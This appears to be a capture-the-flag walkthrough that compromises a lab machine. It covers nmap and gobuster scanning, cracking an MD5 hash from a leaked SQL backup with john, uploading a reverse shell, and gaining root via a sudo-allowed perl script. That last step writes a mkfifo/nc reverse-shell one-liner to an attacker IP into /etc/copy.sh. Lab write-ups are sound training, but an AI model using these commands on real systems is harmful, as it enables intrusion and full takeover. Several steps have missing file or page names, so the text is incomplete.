Have some fun! There might be multiple ways to get user access.
What is the user flag?
nmap -sV -sC <TARGET_IP>
. There are two services exposed: 22/tcp (ssh) and 1583/tcp (simbaexpress) -
nmap --script=vuln <TARGET_IP>
Nmap scan report for Host is up (0.081s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: |_ /content/: Potentially interesting folder | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Seems good.
on browser. -
gobuster dir -u http://<TARGET_IP>/content/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/images (Status: 301) /js (Status: 301) /inc (Status: 301) /as (Status: 301) /_themes (Status: 301) /attachment (Status: 301)
there ismysql\_backup
folder. Download the .sql file inside. -
Open it with or something similar. You should read a line with a passwd header and the a hashed value.
to detect the type of the hash. MD5. ok. -
cat <HASH_HERE> > hash.txt
sudo john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5
Go into the login page
Login with the username inside the .sql file and the cracked password.
Go into
section. -
Load the
into the content manager (change the IP address with yours!) -
nc -lvnp 1234
on your machine. -
Go into
and click on the file you've just uploaded. -
You gained a shell.
cd /home/itguy && cat user.txt
What is the root flag?
sudo -l
- Ok. We don't need sudo password for backup.pl and perl.
- Analyze backup.pl, it runs /etc/copy.sh. Let'see.
- It's a reverse shell. Change the specified ip address to yours.
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP_HERE> 5554 >/tmp/f" > /etc/copy.sh
nc -lnvp 5554
on your machinesudo /usr/bin/perl /home/itguy/backup.pl
on target machine.cat /root/root.txt